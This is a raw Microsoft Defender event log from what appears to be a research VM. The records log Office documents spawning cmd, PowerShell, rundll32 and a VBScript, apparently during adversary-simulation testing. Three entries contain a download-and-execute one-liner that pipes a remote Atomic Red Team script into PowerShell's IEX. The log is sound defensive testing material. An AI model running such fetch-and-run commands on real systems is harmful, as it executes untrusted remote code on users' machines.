112103000x80000000000000003034Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D1E49AAC-8F56-4280-B9BA-993A6D77406C2023-11-20T20:24:15.568ZNT AUTHORITY\SYSTEMC:\Windows\System32\cmd.exeC:\Windows\PSEXESVC.exe1.401.912.01.1.23100.2009ENT\ConsR"cmd" C:\Windows\PSEXESVC.exe0x00000000 112103000x80000000000000003033Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D1E49AAC-8F56-4280-B9BA-993A6D77406C2023-11-20T20:24:15.547ZNT AUTHORITY\SYSTEMC:\Windows\cmd.exeC:\Windows\PSEXESVC.exe1.401.912.01.1.23100.2009ENT\ConsR"cmd" C:\Windows\PSEXESVC.exe0x00000000 112103000x80000000000000003000Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.20093B576869-A4EC-4529-8536-B80A7769E8992023-11-20T20:11:56.850Zresearchvmhaa\researchC:\Users\research\AppData\Local\Temp\script.vbsC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE1.401.912.01.1.23100.2009ENT\ConsR"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" 0x00000000 112103000x80000000000000002983Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T20:07:21.601Zresearchvmhaa\researchC:\Windows\System32\cmd.exeC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE1.401.912.01.1.23100.2009ENT\ConsR"C:\Windows\System32\cmd.exe" "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" 0x00000000 112103000x80000000000000002982Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T20:06:56.977Zresearchvmhaa\researchC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE1.401.912.01.1.23100.2009ENT\ConsR"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" 0x00000000 112103000x80000000000000002975Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.20093B576869-A4EC-4529-8536-B80A7769E8992023-11-20T16:29:48.984Zresearchvmhaa\researchC:\Users\research\AppData\Local\Temp\script.vbsC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE1.401.912.01.1.23100.2009ENT\ConsR"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" 0x00000000 112103000x80000000000000002972Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.20093B576869-A4EC-4529-8536-B80A7769E8992023-11-20T16:27:30.572Zresearchvmhaa\researchC:\Users\research\AppData\Local\Temp\script.vbsC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE1.401.912.01.1.23100.2009ENT\ConsR"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" 0x00000000 112103000x80000000000000002971Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T16:27:18.000Zresearchvmhaa\researchC:\Windows\System32\rundll32.exeC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE1.401.912.01.1.23100.2009ENT\ConsRC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls"C:\Users\research\Desktop\macs\mac5.xls0x00000000 112103000x80000000000000002964Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T15:42:46.183Zresearchvmhaa\researchC:\Windows\System32\cmd.exeC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE1.401.908.01.1.23100.2009ENT\ConsRcmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac7.xls"C:\Users\research\Desktop\macs\mac7.xls0x00000000 112103000x80000000000000002963Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T15:42:37.633Zresearchvmhaa\researchC:\Windows\System32\cmd.exeC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE1.401.908.01.1.23100.2009ENT\ConsRcmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac8.xls"C:\Users\research\Desktop\macs\mac8.xls0x00000000 112103000x80000000000000002961Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T15:42:14.127Zresearchvmhaa\researchC:\Windows\System32\cmd.exeC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE1.401.908.01.1.23100.2009ENT\ConsRcmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac6.xls"C:\Users\research\Desktop\macs\mac6.xls0x00000000